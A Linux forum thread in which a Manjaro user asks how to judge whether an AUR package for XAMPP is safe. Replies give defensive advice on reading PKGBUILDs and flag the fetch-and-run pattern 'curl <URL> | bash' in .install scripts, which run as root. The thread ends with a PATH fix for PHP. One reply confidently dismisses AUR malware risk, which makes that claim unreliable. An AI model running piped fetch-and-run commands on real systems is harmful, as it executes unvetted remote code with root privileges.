Installing AUR Apps

Hello,
i'm actually running manjaro KDE and trying to install xampp for linux. The problem is that i find it only on AUR, and i don't really know if i can trust the package on AUR (as it says that it's potetialy dangerous).
I try as much as possible to download and install apps i need from their official sources, but sometimes i have o go and get them grom the AUR.
So how if the package's source can be trusted and there's no risk using it ?

The warning of being potentially dangerous is not for specific packages, but for AUR in general.

AUR packages are user generated content and such could, in theory, contain malicious commands that could wreck your system.

But since all the build files are openly available on the internet, it's quick to look up the PKGBUILD and see what it does.
If you feel comfortable with it, you can install it.

3 Likes

Thanks for the answer, the problem is that i'm quite new to the "package managing" thing and i don't really know how to identify a package as malicious or not.
I just red the PKGBUILD source code and couldn't really understand much of it.
Is there any tutorial you can recommend me to read/learn so that i can get a grasp of what it does ?

The chance of a AUR package causing security problems etc, is less than you dropping dead in the next 5 seconds.
Their has been just one case of malware in all the years of the AUR that was found in under 4 hours of being released. it would not even compile so not much chance really.

2 Likes

PKGBUILDs are not "source code." They are simple scripts written in very plain English. Don't make things harder for yourself than they really are. Stay awhile, read and learn, and you'll be just fine. :smiley:

regards

4 Likes

PKGBUILD is written in bash. So an understanding of bash would certainly be useful.

For more specific info about PKGBUILD and the Arch packaging format (which is the one used in Manjaro), I would invite you to read these pages at least.

https://wiki.archlinux.org/index.php/PKGBUILD
https://jlk.fjfi.cvut.cz/arch/manpages/man/PKGBUILD.5

But even if you do not understand fully PKGBUILD, I will give you two thing you can check pretty easily that can alert you of a potential threat:

  • Verify what files are downloaded in order to build the package. You can see that in sources=. For example, if you want to install TeamViewer, but you see that it is taking files from https://someweirdunreatedsite.com, or maybe something more subtle like https://team-viewer.com, well that looks suspicious.

  • If you see some wget or curl command either in the PKGBUILD or in the .install file (script that will be executed before/after the package get installed/removed/upgraded, not every package will have one), it might hide something shady. Those commands are used to download a file(s), and could be used to potentially download malicious file(s) that the attacker doesn't want you to see easily, and those commands would be either run while building the package (if it is in the PKGBUILD) or when installing/removing/upgrading the package (if it is in the .install file). If you have something like curl <URL> | bash then, it is even more suspicious since the requested file is a script that will be executed right after being downloaded from whatever source it is mentioned. Note that commands in the .install file are run as root (UID 0) and therefore, with the highest level of privileges possible; therefore, if there is malicious commands in the .install (like retrieving a malicious script on the internet and executing it), they are going to be run with the highest level of privileges on your system.

If other people has additional easy tips you can verify and that doesn't require deep knowledge of bash scripting to understand well, fell free to suggest.

2 Likes

The xampp package in AUR seems to be quite a bit out of date and according to the comments there, it doesn't work.

Is there a real need to use that package? Couldn't you install the components individually?

Alternatively, if you want a plug & play solution it seems like it would be the ideal candidate for running in a container like docker & friends.

The xampp package doesn't work so i had to install it manually and get it to work. The only problem i'm facing right now is setting the PHP global variable (the php bin is in /opt/lampp/bin/php and i could execute the pvp -v command to verify it works).

I used the set php=/opt/lampp/bin/php command to set it as a global variable and logged out/in but the php command is'nt recognized. If someone can give me a quick solution for this one so that i don't have to open a new topic about it that would be nice.

If you want that variable to be set in your environment all the time, try adding this line to the file /etc/environment:

php=/opt/lampp/bin/php

I already tried that and restarted my computer, but i'm still getting this error :

php -v
bash: php: command not found

Here's the content of the /etc/environment file :

#
# This file is parsed by pam_env module
#
# Syntax: simple "KEY=VAL" pairs on separate lines
#

php=/opt/lampp/bin/php

That is due to your path not having that directory in it. I am not sure that it is really a problem for php but if you need/want it in your path you can add it.

Try putting this in your ~/.bashrc file:

export PATH=$PATH:/opt/lampp/bin
1 Like

That line did the trick, i added it to the end on the .bashrc file and now php is recognized as a command.

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.